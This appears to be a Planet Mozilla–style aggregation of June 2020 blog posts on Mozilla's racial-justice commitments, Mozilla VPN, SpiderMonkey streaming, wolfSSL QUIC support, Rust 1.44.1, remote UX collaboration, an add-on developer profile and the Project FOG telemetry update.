How Mozilla shows up in the world and engages to uplift and increase Black voices in the broader efforts to build a better internet, beyond just our own teams, is equally important. We have supported organizations working at the intersection of tech and racial justice such as the ACLU, Color of Change and Astraea Foundation. We’ve already committed to further work at the intersection of technology and racial justice in 2020 because it helps us build a bigger and stronger movement for a healthy internet.

Beyond those existing partnerships, we are also committing to:

- Direct at least 40% of Mozilla Foundation grants in 2020 to Black-led projects or organizations, with specific targets to come for 2021 and beyond. We see this as critical to the transformation of our organization and the broader healthy internet movement we are part of.

- Develop and invest in new college engagement programs with Historically Black Colleges and Universities (HBCUs) and Black student networks. We will work closely with professors and students on topics like open source and trustworthy AI, and connect them to the Mozilla community. Mozilla is committed to a culture shift in tech.

- Focus Mozilla’s brand and social media efforts on lifting up people and organizations standing for Black lives and communities, especially where they’re working at the intersection of technology and racial justice.

By committing to change who we are, what we build and what we do beyond our products, we are talking about transforming how Mozilla shows up in the world in fundamental ways. Making this change will require us to support each other, to allow for mistakes and to embrace learning. But most of all it will require us to focus tenaciously on our values and lean into the idea that we’re creating an open internet for all. This isn’t just essential for this moment in time. It’s critical for the future of Mozilla, the future of the internet and the future of our society.

The post First Steps Toward Lasting Change appeared first on The Mozilla Blog.

https://blog.mozilla.org/blog/2020/06/18/first-steps-toward-lasting-change/

|

|

Support.Mozilla.Org: Social Support program updates |

TL;DR: The Social Support Program is moving from Buffer Reply to Conversocial as of June 1st, 2020. We’re also going to reply from @FirefoxSupport now instead of the official brand account. If you’re interested in joining us in Conversocial, please fill out this form (make sure you meet the requirements before you fill out the form).

We have very exciting news from the Social Support Program. In the past, we invited a few trusted contributors to Buffer Reply in order to let them reply to Twitter conversations from the official account. However, since Buffer sunset their Reply service on the 1st of June, we have now officially moved to Conversocial to replace Buffer Reply.

Conversocial is one of a few tools that stood out from the search process that began at the beginning of the year because it focuses on support rather than social media management. We like the pricing model as well since it doesn’t restrict us from adding more contributors because it’s volume-based instead of seat-based.

If you’re interested in joining us on Conversocial, please fill out this form. However, please be advised that we have a few requirements before we can let you into the tool.

Here are a few resources that we’ve updated to reflect the changes in the Social Support program:

We also just acquired the @FirefoxSupport account on Twitter with the help of the Marketing team. Moving forward, contributors from the social support program will reply from this account instead of the official brand account. This will allow the official brand account to focus on brand engagement and will also give us an opportunity to utilize the greater functionality of a full account.

We’re happy about the change and excited to see how we can scale the program moving forward. I hope you all share the same excitement and will continue to support and rock the helpful web!

https://blog.mozilla.org/sumo/2020/06/18/social-support-program-updates/

|

|

Mozilla Future Releases Blog: Introducing Firefox Private Network’s VPN – Mozilla VPN |

We are now spending more time online than ever. At Mozilla, we are working hard to build products to help you take control of your privacy and stay safe online. To help us better understand your needs and challenges, we reached out to you — our users and supporters of Firefox Private Network.

We learned from you and our peers that many of you want to feel safer online without jumping through hoops and decided to start with the goal of providing device-level protection. This is why we built the Firefox Private Network’s Mozilla VPN, to help you control how your data is shared within your network. Although there are a lot of VPNs out there, we felt like you deserved a VPN with the Mozilla name behind it.

To build the best VPN, we turned to you again. After all, who knows you better than you, right? We started recruiting Beta testers in 2019. It was amazing to see the recruitment attract potential testers from over 200 countries around the world.

We started working with a small group of you and learned a lot. With the VPN in your hands, we confirmed some of our initial hypotheses and identified important priorities for the future. For example, over 70% of early Beta-testers say that the VPN helps them feel empowered, safe and independent while online. In addition, 83% of early Beta-testers found the VPN easy to use.

We know that we are on the right path to building a VPN that makes your online experience safer and easier to manage. We’ll keep making the right decisions for you guided by our Data Privacy Principles. This means that we are actively forgoing revenue streams and additional profit-making opportunities by committing to never track your browsing activities and avoiding any third party in-app data analytics platforms.

Your feedback also helped us identify ways to make the VPN more impactful and privacy-centric, which includes building features like split tunneling and making it available on Mac clients. The VPN will exit Beta phase in the next few weeks, move out of the Firefox Private Network brand, and become a stand-alone product, Mozilla VPN, to serve a larger audience.

To our Beta-testers, we would like to thank you for working with us. Your feedback and support made it possible for us to launch Mozilla VPN.

We are working hard to make the official product, the Mozilla VPN, available in selected regions this year. We will continue to offer the Mozilla VPN at the current pricing model for a limited time, which allows you to protect up to five devices on Windows, Android, and iOS at $4.99/month.

As we realize our vision to provide next-generation privacy and security solutions, we would like to invite you to continue to share your thoughts with us. Follow our journey through this blog, and stay connected via the waitlist here*. If you are interested to learn more about the product, the Beta Mozilla VPN is available for download in the U.S. now.

*For users outside of the U.S., we will only contact you with product updates when Mozilla VPN becomes available for your region and device.

From The Firefox Private Network Mozilla VPN Team

The post Introducing Firefox Private Network’s VPN – Mozilla VPN appeared first on Future Releases.

|

|

Hacks.Mozilla.Org: Compiler Compiler: A Twitch series about working on a JavaScript engine |

Last week, I finished a three-part pilot for a new stream called Compiler Compiler, which looks at how the JavaScript Specification, ECMA-262, is implemented in SpiderMonkey.

JavaScript …is a programming language. Some people love it, others don’t. JavaScript might be a bit messy, but it’s easy to get started with. It’s the programming language that taught me how to program and introduced me to the wider world of programming languages. So, it has a special place in my heart. As I taught myself, I realized that other people were probably facing a lot of the same struggles as I was. And really that is what Compiler Compiler is about.

The first bug of the stream was a test failure around increment/decrement. If you want to catch up on the series so far, the pilot episodes have been posted and you can watch those in the playlist here:

Future episodes will be scheduled here with descriptions, in case there is a specific topic you are interested in. Look for blog posts here to wrap up each bug as we go.

What is SpiderMonkey?

SpiderMonkey is the JavaScript engine for Firefox. Along with V8, JSC, and other implementations, it is what makes JavaScript run. Contributing to an engine might be daunting due to the sheer amount of underlying knowledge associated with it.

- Compilers are well studied, but the materials available to learn about them (such as the Dragon book, and other texts on compilers) are usually oriented to university-setting study — with large dedicated periods of time to understanding and practicing. This dedicated time isn’t available for everyone.

- SpiderMonkey is written in C++. If you come from an interpreted language, there are a number of tools to learn in order to really get comfortable with it.

- It is an implementation of the ECMA-262 standard, the standard that defines JavaScript. If you have never read programming language grammars or a standard text, this can be difficult to read.

The Compiler Compiler stream is about making contributing easier. If you are not sure how to get started, this is for you!

The Goals and the Structure

I have two goals for this series. The first, and more important one, is to introduce people to the world of language specification and implementation through SpiderMonkey. The second is to make SpiderMonkey as conformant to the ECMA-262 specification as possible, which luckily is a great framing device for the first goal.

I have organized the stream as a series of segments with repeating elements, every segment consisting of about 5 episodes. A segment will start from the ECMA-262 conformance test suite (Test262) with a test that is failing on SpiderMonkey. We will take some time to understand what the failing test is telling us about the language and the SpiderMonkey implementation. From there we will read and understand the behavior specified in the ECMA-262 text. We will implement the fix, step by step, in the engine, and explore any other issues that arise.

Each episode in a segment will be 1 hour long, followed by free chat for 30 minutes afterwards. If you have questions, feel free to ask them at any time. I will try to post materials ahead of time for you to read about before the stream.

If you missed part of the series, you can join at the beginning of any segment. If you have watched previous segments, then new segments will uncover new parts of the specification for you, and the repetition will make it easier to learn. A blog post summarizing the information in the stream will follow each completed segment.

Last but not least, a few thank yous

I have been fortunate enough to have my colleagues from the SpiderMonkey team and TC39 join the chat. Thank you to Iain Ireland, Jason Orendorff and Gus Caplan for joining the streams and answering questions for people. Thank you to Jan de Mooij and André Bargull for reviews and comments. Also a huge thank you to Sandra Persing, Rainer Cvillink, Val Grimm and Melissa Thermidor for the support in production and in getting the stream going, and to Mike Conley for the streaming tips.

The post Compiler Compiler: A Twitch series about working on a JavaScript engine appeared first on Mozilla Hacks - the Web developer blog.

https://hacks.mozilla.org/2020/06/compiler-compiler-working-on-a-javascript-engine/

|

|

Daniel Stenberg: QUIC with wolfSSL |

We have started the work on extending wolfSSL to provide the necessary API calls to power QUIC and HTTP/3 implementations!

Small, fast and FIPS

The TLS library known as wolfSSL is already very often a top choice when users are looking for a small and yet very fast TLS stack that supports all the latest protocol features; including TLS 1.3 support – open source with commercial support available.

As manufacturers of IoT devices and other systems with memory, CPU and footprint constraints are looking forward to following the Internet development and switching over to upcoming QUIC and HTTP/3 protocols, wolfSSL is here to help users take that step.



A QUIC reminder

In case you have forgotten, here’s a schematic view of HTTPS stacks, old vs new. On the right side you can see HTTP/3, QUIC and the little TLS 1.3 box there within QUIC.

ngtcp2

There are no plans to write a full QUIC stack. There are already plenty of those. We’re talking about adjustments and extensions of the existing TLS library API set to make sure wolfSSL can be used as the TLS component in a QUIC stack.

One of the leading QUIC stacks and so far the only one I know of that does this, ngtcp2 is written to be TLS library agnostic and allows different TLS libraries to be plugged in as different backends. I believe making such a plugin for wolfSSL is a sensible step as soon as there’s code to try out.

A neat effect of that would be that once wolfSSL works as a backend to ngtcp2, it should be possible to do full-fledged HTTP/3 transfers using curl powered by ngtcp2+wolfSSL. Contact us with other ideas for QUIC stacks you would like us to test wolfSSL with!

FIPS 140-2

We expect wolfSSL to be the first FIPS-based implementation to add support for QUIC. I hear this is valuable to a number of users.

When

This work begins now and this is just a blog post of our intentions. We and I will of course love to get your feedback on this and whatever else that is related. We’re also interested to get in touch with people and companies who want to be early testers of our implementation. You know where to find us!

I can promise you that the more interest we sense in this effort, the sooner we will see the first code to test out.

It seems likely that we’re not going to support any older TLS drafts for QUIC than draft-29.

|

|

The Rust Programming Language Blog: Announcing Rust 1.44.1 |

The Rust team has published a new point release of Rust, 1.44.1. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.44.1 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website.

What's in Rust 1.44.1

Rust 1.44.1 addresses several tool regressions in Cargo, Clippy, and Rustfmt introduced in the 1.44.0 stable release. You can find more detailed information on the specific regressions in the release notes.

Contributors to 1.44.1

Many people came together to create Rust 1.44.1. We couldn't have done it without all of you. Thanks!

|

|

Alex Vincent: Ten years to a bachelor’s degree in computer science |

TLDR: I’m back, everyone.

Yes, I’ve spent the last ten years working on a bachelor’s degree. That’s because I’ve been working full-time as a software engineer, and going to school part-time. It’s long overdue, but California State University, East Bay has just awarded me a Bachelor of Science degree in computer science, with a minor in mathematics and cum laude honors.

With no college debt, to boot.

I held off on posting it here, since CSUEB hadn’t officially confirmed the degree until I logged in and saw it today. There was always an ever-so-slight chance that something would be missed along the way. I owe thanks to a lot of people, including most memorably:

- Dr. Robert Yest, Chabot College

- Professor Jonathan Traugott, Chabot College and CSUEB

- Professor Keith Mehl, Chabot College

- Professor Egl Batchelor, Chabot College

- Dr. Roger Doering, CSUEB

- Dr. Matt Johnson, CSUEB

- Dr. Eddie Reiter, CSUEB

- Dr. Zahra Derakshandeh, CSUEB

I have not yet decided whether to go for a master’s degree. I have decided I need at least a year away from college to recover.

Besides, I’ve already dived into a big project, making Mozilla’s UpdateManager operate asynchronously. This is not easy… but I’m crafting a tool, StackLizard, to help me find all the places where a function must be marked async, its callers await, their enclosing functions async, and so on. Throw XPCOM components into the mix, and it’s going to get deep. But not impossible. I’m basing StackLizard on various tools eslint already uses and supports, in the hope that I can add it to Mozilla’s tool chest as it evolves. (Folding StackLizard into eslint does seem impractical, as eslint operates on individual scripts, and StackLizard will be jumping all over the place.)
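The propagation described here (a function becomes async, so its callers must await it and become async themselves, and so on) amounts to walking a call graph backwards. The sketch below is not StackLizard; the call graph, the function names in it and `functionsToMarkAsync` are all hypothetical, and it skips the hard part of actually building the graph from source files and XPCOM components.

```javascript
// Hypothetical call graph: each key is a function, each value lists what it calls.
const callGraph = {
  checkForUpdates: ["getActiveUpdate", "logStatus"],
  showPrompt: ["checkForUpdates"],
  onStartup: ["showPrompt", "logStatus"],
  logStatus: [],
  getActiveUpdate: [],
};

// Return every function that has to become async once `seed` becomes async:
// the seed itself, its callers (which must now await it), their callers, and so on.
function functionsToMarkAsync(graph, seed) {
  // Invert the graph so callers can be looked up by callee.
  const callers = new Map();
  for (const [caller, callees] of Object.entries(graph)) {
    for (const callee of callees) {
      if (!callers.has(callee)) callers.set(callee, []);
      callers.get(callee).push(caller);
    }
  }

  // Breadth-first walk from the seed up through its transitive callers.
  const result = new Set([seed]);
  const queue = [seed];
  while (queue.length > 0) {
    const current = queue.shift();
    for (const caller of callers.get(current) || []) {
      if (!result.has(caller)) {
        result.add(caller);
        queue.push(caller);
      }
    }
  }
  return [...result].sort();
}

console.log(functionsToMarkAsync(callGraph, "getActiveUpdate"));
// [ 'checkForUpdates', 'getActiveUpdate', 'onStartup', 'showPrompt' ]
```

Note that `logStatus` is left alone: it is called by affected functions but never calls one, so it has nothing to await.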

I’ll get back to es-membrane and the “Membrane concepts” presentation when I can.

|

|

Firefox UX: Remote UX collaboration across different time zones (yes, it can be done!) |

Even in the “before” times, the Firefox UX team was distributed across many different time zones. Some of us already worked remotely from our home offices or co-working spaces. Other team members worked from one of the Mozilla offices around the world.

The content strategists, designers, and researchers on the Firefox UX team span many time zones.

That said, remote collaboration still has its challenges. When you’re not in the same room with your teammates — or even the same time zone — problem solving and iterating together might not come as naturally. Don’t get discouraged. It can be done, and done well.

We recently built a prototype for the Firefox Private Network extension. Fast iteration on the current experience was needed to introduce new functionality. The challenge? Our content strategist was based in Chicago, and our interaction designer was 7 hours ahead in Berlin. Here’s how we came together to co-design the prototype despite the time zone challenges.

Align on your goals and working process.

You have a deadline. You have a general idea of what you need to do to get there. You’re enthusiastic and ready to go. But wait! Don’t get started just yet.

First, schedule time with your teammate. Grab a cup of coffee (if you’re Betsy) or espresso (if you’re Emanuela). Talk about how you plan to work together. By building a set of shared expectations at the outset, you can minimize confusion and frustration later.

Betsy is just starting her day in Chicago while it’s afternoon for Emanuela in Berlin.

Here are a few questions to help guide this conversation.

- What tools will you use? Is there a shared workspace where you can both contribute?

- When will you converge and diverge? Find times when your working hours overlap so you can have in-person conversations.

- How will you communicate asynchronously? Will you keep a running conversation in Slack? Or leave comments for each other on documents or Miro boards?

- Who will own certain aspects of the work?

Even though we had already worked together, we came up with a set of guidelines to best approach this specific challenge. The important part is that you align as a team about your approach. You can always fine-tune as you go.

The process we defined for our asynchronous collaboration.

Our task was to make significant functionality changes to an existing experience for the Firefox Private Network extension. We agreed on these tools and process.

- We’d use Miro, a collaborative whiteboarding tool.

- Emanuela would place her first iteration of screens on the board, starting with existing copy.

- Betsy would post questions as comments. She would post copy changes as sticky notes.

- If the question could be easily answered, Emanuela would reply and resolve it. If it wasn’t a quick answer, we would discuss it at our next in-person check-in.

- Emanuela would incorporate copy changes and move the sticky notes off the board to signal this task was done.

Now we were ready to get to work!

Share your ideas early and often to build trust.

It’s easy to quickly build trust when you work together in the same physical space. You can better read how the other person is reacting to your ideas. You ideate, sketch, and design together at the same time.

To best replicate this trust building when working independently in different time zones, we used Miro as a shared collaboration workspace. We agreed to put concepts on the board before they truly felt “done.” This allowed us to share our thinking as it evolved and prevented our efforts from becoming too siloed. When each of us started our work day, the board looked a lot different than it had our previous evening.

We could then bounce ideas back and forth, just as we would have done when sitting in the same room sketching together. We each added stickies, product screenshots, and wireframes to visualize our ideas. Content and design were so closely knit throughout that we found ourselves contributing ideas in both domains.

Ask clarifying questions and over-communicate your thinking.

Because there are 7 hours between us, we weren’t always able to work together at the same time. We both did quite a bit of work on our own time. Then we’d come together and sync up. We converged and diverged frequently throughout the project.

Inevitably, you might be a little confused by a design or copy decision the other person made during their solo work time, then placed on your shared board. This is totally natural. If you don’t understand something, just ask for clarification. Nicely. The next time you meet on Zoom, you can talk it out.

If you decide to take things in a little of a different direction, take the extra few minutes to write down your rationale and share that back with your teammate. It’s the equivalent of explaining your thinking out loud.

Yes, over-communicating takes a bit of extra work, but in our experience it doesn’t slow you down. This exercise actually helps you crystallize your thinking and will come in handy later if you need to explain the “why” behind your decisions to stakeholders.

Allow space for spontaneous chats and check-ins.

We would do a lot of quick check-ins on Zoom, but these were never pre-scheduled or official meetings. During the few hours our time zones overlapped, our chats were mostly spontaneous, quick, and informal. We would often drum up a Zoom meeting directly from Slack.

We usually checked in with each other when Betsy came online in the morning, then again before Emanuela signed off for the day. Even with a tight deadline, we stayed in sync every step of the way and laid the foundation for a strong, trusting partnership.

|

|

Mozilla Addons Blog: Friend of Add-ons: Juraj Mäsiar |

Our newest Friend of Add-ons is Juraj Mäsiar! Juraj is the developer of several extensions for Firefox, including Scroll Anywhere, which is part of our Recommended Extensions program. He is also a frequent contributor on our community forums, where he offers friendly advice and input for extension developers looking for help.

Juraj first started building extensions for Firefox in 2016 during a quiet weekend trip to his hometown. The transition to the WebExtensions API was less than a year away, and developers were starting to discuss their migration plans. After discovering many of his favorite extensions weren’t going to port to the new API, Juraj decided to try the migration process himself to give a few extensions a second life. “I was surprised to see it’s just normal JavaScript, HTML and CSS — things I already knew,” he says. “I put some code together and just a few moments later I had a working prototype of my ScrollAnywhere add-on. It was amazing!”

Juraj immersed himself in exploring the WebExtensions API and developing extensions for Firefox. It wasn’t always a smooth process, and he’s eager to share some tips and tricks to make the development experience easier and more efficient. “Split your code to ES6 modules. Share common code between your add-ons — you can use `git submodule` for that. Automate whatever can be automated. If you don’t know how, spend the time learning how to automate it instead of doing it manually,” he advises. Developers can also save energy by not reinventing the wheel. “If you need a build script, use webpack. Don’t build your own DOM handling library. If you need complex UI, use existing libraries like Vue.js.”

Juraj also recommends staying active: “Doing enough sport every day will keep your mind fresh and ready for new challenges.” He stays active by playing VR games and rollerblading.

Currently, Juraj is experimenting with the CryptoAPI and testing it with a new extension that will encrypt user notes and synchronize them with Firefox Sync. The goal is to create a secure extension that can be used to store sensitive material, like a server configuration or a home wifi password.

On behalf of the Add-ons Team, thank you for all of your wonderful contributions to our community, Juraj!

If you are interested in getting involved with the add-ons community, please take a look at our current contribution opportunities.

The post Friend of Add-ons: Juraj Mäsiar appeared first on Mozilla Add-ons Blog.

https://blog.mozilla.org/addons/2020/06/15/friend-of-add-ons-juraj-masiar/

|

|

Patrick Cloke: Raspberry Pi File Server |

These are just some quick notes (for myself) on how I recently set up my Raspberry Pi as a file server. The goal was to have a shared folder so that a Sonos could play music from it. The data would be backed by a microSD card plugged into USB.

- Update …

https://patrick.cloke.us/posts/2020/06/12/raspberry-pi-file-server/

|

|

Data@Mozilla: This Week in Glean: Project FOG Update, end of H12020 |

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

It’s been a while since last I wrote on Project FOG, so I figure I should update all of you on the progress we’ve made.

A reminder: Project FOG (Firefox on Glean) is the year-long effort to bring the Glean SDK to Firefox. This means answering such varied questions as “Where are the docs going to live?” (here), “How do we update the SDK when we need to?” (this way), “How are tests gonna work?” (with difficulty), and so forth. In a project this long you can expect updates from time to time. So where are we?

First, we’ve added the Glean SDK to Firefox Desktop and include it in Firefox Nightly. This is only a partial integration, though, so the only builtin ping it sends is the “deletion-request” ping when the user opts out of data collection in the Preferences. We don’t actually collect any data, so the ping doesn’t do anything, but we’re sending it and soon we’ll have a test ensuring that we keep sending it. So that’s nice.
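The opt-out behaviour described above can be pictured with a toy model. This is only a sketch under stated assumptions, not the Glean SDK's code: the `Client` type and its methods are hypothetical, and the only detail taken from the post is that opting out triggers a ping named “deletion-request”.

```rust
/// Hypothetical, simplified stand-in for a telemetry client.
/// None of these names come from the Glean SDK.
pub struct Client {
    upload_enabled: bool,
    pending_pings: Vec<String>,
}

impl Client {
    /// Starts with upload enabled and nothing queued.
    pub fn new() -> Self {
        Client {
            upload_enabled: true,
            pending_pings: Vec::new(),
        }
    }

    /// Records the user's choice. Only the enabled -> disabled
    /// transition queues a "deletion-request" ping; repeating the
    /// opt-out does not queue a second one.
    pub fn set_upload_enabled(&mut self, enabled: bool) {
        if self.upload_enabled && !enabled {
            self.pending_pings.push("deletion-request".to_string());
        }
        self.upload_enabled = enabled;
    }

    /// Names of the pings waiting to be sent.
    pub fn pending_pings(&self) -> &[String] {
        &self.pending_pings
    }
}
```

A test that “ensures we keep sending it” would, in this toy model, amount to flipping the setting off and checking that the queue contains exactly one “deletion-request” entry.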

Second, we’ve written a lot of Design Proposals. The Glean Team and all the other teams our work impacts are widely distributed across a non-trivial fragment of the globe. To work together and not step on each other’s toes we have a culture of putting most things larger than a bugfix into Proposal Documents which we then pass around asynchronously for ideation, feedback, review, and signoff. For something the size and scope of adding a data collection library to Firefox Desktop, we’ve needed more than one. These design proposals are Google Docs for now, but will evolve to in-tree documentation (like this) as the proposals become code. This way the docs live with the code and hopefully remain up-to-date for our users (product developers, data engineers, data scientists, and other data consumers), and are made open to anyone in the community who’s interested in learning how it all works.

Third, we have a Glean SDK Rust API! Sorta. To limit scope creep we haven’t added the Rust API to mozilla/glean and are testing its suitability in FOG itself. This allows us to move a little faster by mixing our IPC implementation directly into the API, at the expense of needing to extract the common foundation later. But when we do extract it, it will be fully-formed and ready for consumers since it’ll already have been serving the demanding needs of FOG.

Fourth, we have tests. This was a bit of a struggle as the build order of Firefox means that any Rust code we write that touches Firefox internals can’t be tested in Rust tests (they must be tested by higher-level integration tests instead). By damming off the Firefox-adjacent pieces of the code we’ve been able to write and run Rust tests of the metrics API after all. Our code coverage is still a little low, but it’s better than it was.
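One common way to get this kind of separation, shown here only as a hedged sketch and not as FOG's actual code, is to keep the application-facing pieces behind a trait so that the metric logic can be exercised by plain Rust tests with a stand-in. Every name below (`Dispatcher`, `CounterMetric`, `RecordingDispatcher`) is hypothetical.

```rust
use std::cell::RefCell;

/// Hypothetical boundary: anything that would need application
/// internals (IPC, threads, preferences) hides behind this trait.
pub trait Dispatcher {
    fn send_to_parent(&self, metric: &str, amount: i32);
}

/// Hypothetical metric type that contains only pure-Rust logic.
pub struct CounterMetric {
    name: String,
    value: i32,
}

impl CounterMetric {
    pub fn new(name: &str) -> Self {
        CounterMetric {
            name: name.to_string(),
            value: 0,
        }
    }

    /// Ignores non-positive amounts; otherwise adds locally
    /// (saturating at i32::MAX) and forwards through the dispatcher.
    pub fn add(&mut self, amount: i32, dispatcher: &dyn Dispatcher) {
        if amount <= 0 {
            return;
        }
        self.value = self.value.saturating_add(amount);
        dispatcher.send_to_parent(&self.name, amount);
    }

    pub fn value(&self) -> i32 {
        self.value
    }
}

/// Test stand-in that records calls instead of touching the application.
#[derive(Default)]
pub struct RecordingDispatcher {
    pub calls: RefCell<Vec<(String, i32)>>,
}

impl Dispatcher for RecordingDispatcher {
    fn send_to_parent(&self, metric: &str, amount: i32) {
        self.calls.borrow_mut().push((metric.to_string(), amount));
    }
}

#[cfg(test)]
mod counter_tests {
    use super::*;

    #[test]
    fn counter_adds_and_forwards() {
        let fake = RecordingDispatcher::default();
        let mut clicks = CounterMetric::new("ui.clicks");
        clicks.add(2, &fake);
        clicks.add(-5, &fake); // ignored: non-positive amount
        assert_eq!(clicks.value(), 2);
        assert_eq!(fake.calls.borrow().len(), 1);
    }
}
```

With this shape, `cargo test` can run the test module without building the host application; only the real `Dispatcher` implementation would need higher-level integration tests.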

Fifth, we are using Firefox’s own network stack to send pings. In a stroke of good fortune the application-services team (responsible for fan-favourite Firefox features “Sync”, “Send Tab”, and “Firefox Accounts”) was bringing a straightforward Rust networking API called Viaduct to Firefox Desktop almost exactly when we found ourselves in need of one. Plugging into Viaduct was a breeze, and now our “deletion-request” pings can correctly work their way through all the various proxies and protocols to get to Mozilla’s servers.

Sixth, we have firm designs on how to implement both the C++ and JS APIs in Firefox. They won’t be fully-fledged language bindings the way that Kotlin, Python, and Swift are (( they’ll be built atop the Rust language binding so they’re really more like shims )), but they need to have every metric type and every metric instance that a full language binding would have, so it’s no small amount of work.
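To illustrate what “more like shims” could mean, here is a minimal sketch assuming a C-ABI layer over a Rust metric. It is not the FOG design: the `Counter` type, the `CLICKS` instance, the numeric ids, and the `shim_counter_*` functions are all hypothetical. A real export would also need an unmangled symbol name, which is left out here.

```rust
use std::sync::atomic::{AtomicI32, Ordering};

/// Hypothetical Rust-side metric; the shim below only forwards to it.
pub struct Counter {
    value: AtomicI32,
}

impl Counter {
    pub const fn new() -> Self {
        Counter {
            value: AtomicI32::new(0),
        }
    }

    pub fn add(&self, amount: i32) {
        self.value.fetch_add(amount, Ordering::SeqCst);
    }

    pub fn get(&self) -> i32 {
        self.value.load(Ordering::SeqCst)
    }
}

/// One static per metric instance (hypothetical instance and id).
pub static CLICKS: Counter = Counter::new();

/// Maps a numeric id, as a C++ or JS caller might pass it, to an instance.
fn counter_by_id(id: u32) -> Option<&'static Counter> {
    match id {
        1 => Some(&CLICKS),
        _ => None,
    }
}

/// C-ABI shim: adds to the counter with the given id.
/// Unknown ids are silently ignored.
pub extern "C" fn shim_counter_add(id: u32, amount: i32) {
    if let Some(counter) = counter_by_id(id) {
        counter.add(amount);
    }
}

/// C-ABI shim: reads a counter, returning -1 for an unknown id.
pub extern "C" fn shim_counter_get(id: u32) -> i32 {
    counter_by_id(id).map_or(-1, |counter| counter.get())
}
```

Even in this toy form, every metric type needs its own pair of shim functions and every metric instance needs an entry in the id lookup, which hints at why the work is not small.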

But where does that leave our data consumers? For now, sadly, there’s little to report on both the input and output sides: We have no way for product engineers to collect data in Firefox Desktop (and no pings to send the data on), and we have no support in the pipeline for receiving data, not that we have any to analyse. These will be coming soon, and when they do we’ll start cautiously reaching out to potential first customers to see whether their needs can be satisfied by the pieces we’ve built so far.

And after that? Well, we need to do some validation work to ensure we’re doing things properly. We need to implement the designs we proposed. We need to establish how tasks accomplished in Telemetry can now be accomplished in the Glean SDK. We need to start building and shipping FOG and the Glean SDK beyond Nightly to Beta and Release. We need to implement the builtin Glean SDK pings. We need to document the designs so others can understand them, best practices so our users can follow them, APIs so engineers can use them, test guarantees so QA can validate them, and grand processes for migration from Telemetry to Glean so that organizations can start roadmapping their conversions.

In short: plenty has been done, and there’s still plenty to do.

I guess we’d better be about it, then.

:chutten

(( this is a syndicated copy of the original post ))

https://blog.mozilla.org/data/2020/06/12/this-week-in-glean-project-fog-update-end-of-h12020/

|

|